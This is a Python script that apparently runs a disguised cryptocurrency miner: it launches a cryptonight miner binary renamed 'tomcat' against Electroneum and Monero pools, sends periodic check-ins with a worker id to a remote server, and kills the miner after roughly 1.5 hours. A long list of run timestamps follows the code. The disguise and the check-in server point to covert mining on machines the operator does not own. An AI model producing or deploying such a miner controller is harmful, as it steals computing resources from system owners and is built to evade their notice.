import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 16:29:06.275276
#2018-02-17 18:17:07.247924
#2018-02-17 20:04:06.398245
#2018-02-17 21:53:01.306899
#2018-02-17 23:38:05.456164
#2018-02-18 01:27:04.877083
#2018-02-18 03:14:04.224685
#2018-02-18 05:03:01.734841
#2018-02-18 06:54:06.471007
#2018-02-18 08:42:07.052430
#2018-02-18 10:28:04.009615
#2018-02-18 12:14:06.272462
#2018-02-18 14:01:06.313883
#2018-02-18 15:51:06.588480
#2018-02-18 17:41:03.575749
#2018-02-18 19:28:06.074754
#2018-02-18 21:13:04.837863
#2018-02-18 23:01:05.663302
#2018-02-19 00:48:05.447914
#2018-02-19 02:35:02.248878
#2018-02-19 04:21:01.725048
#2018-02-19 06:05:08.419224
#2018-02-19 07:53:05.979772
#2018-02-19 09:43:07.036536
#2018-02-19 11:33:06.218524
#2018-02-19 13:20:08.887698
#2018-02-19 15:09:01.875268
#2018-02-19 16:56:01.880664
#2018-02-19 18:42:06.063478
#2018-02-19 20:33:02.102193
#2018-02-19 22:19:04.018100
#2018-02-20 00:06:05.531770
#2018-02-20 01:54:07.285659
#2018-02-20 03:44:06.864071
#2018-02-20 05:30:07.721110
#2018-02-20 07:14:05.536587
#2018-02-20 08:59:07.056225
#2018-02-20 10:43:08.981674
#2018-02-20 12:29:06.965892
#2018-02-20 14:16:06.813411
#2018-02-20 16:01:11.326360
#2018-02-20 17:47:11.675810
#2018-02-20 19:40:06.629359
#2018-02-20 21:27:05.897442
#2018-02-20 23:10:10.386947
#2018-02-21 00:53:05.734560
#2018-02-21 02:38:05.019332
#2018-02-21 04:26:06.551157
#2018-02-21 06:13:05.038863
#2018-02-21 07:59:06.318543
#2018-02-21 09:44:07.016083
#2018-02-21 11:34:04.964099
#2018-02-21 13:24:06.441335
#2018-02-21 15:09:07.178855
#2018-02-21 16:58:07.177844
#2018-02-21 18:46:06.020772
#2018-02-21 20:33:05.248172
#2018-02-21 22:20:08.535967
#2018-02-22 00:09:04.573123
#2018-02-22 01:56:06.476816
#2018-02-22 03:43:06.316907
#2018-02-22 05:30:09.834867
#2018-02-22 07:15:08.056307
#2018-02-22 09:04:07.830721
#2018-02-22 10:52:02.203465
#2018-02-22 12:38:04.839288
#2018-02-22 14:23:08.865528
#2018-02-22 16:10:08.968446
#2018-02-22 17:55:10.140463
#2018-02-22 19:43:06.554194
#2018-02-22 21:35:01.439581
#2018-02-22 23:24:05.512147
#2018-02-23 01:11:01.490120
#2018-02-23 02:59:03.905198
#2018-02-23 04:46:04.182622
#2018-02-23 06:31:02.163438
#2018-02-23 08:18:06.258348
#2018-02-23 10:35:09.119896
#2018-02-23 12:28:08.713285
#2018-02-23 14:17:09.147842
#2018-02-23 16:10:09.001134
#2018-02-23 17:56:04.549698
#2018-02-23 19:42:06.666309
#2018-02-23 21:24:08.136846
#2018-02-23 23:12:04.135589
#2018-02-24 01:01:01.543275
#2018-02-24 02:54:07.344533
#2018-02-24 04:43:01.746172
#2018-02-24 06:27:01.827706
#2018-02-24 08:16:02.021282
#2018-02-24 09:59:07.369230
#2018-02-24 11:57:06.931170
#2018-02-24 13:45:09.724102
#2018-02-24 15:34:04.799121
#2018-02-24 17:29:03.480006
#2018-02-24 19:17:03.756347
#2018-02-24 21:04:06.635043
#2018-02-24 23:38:01.866212
#2018-02-25 02:59:01.891268
#2018-02-25 06:46:05.000225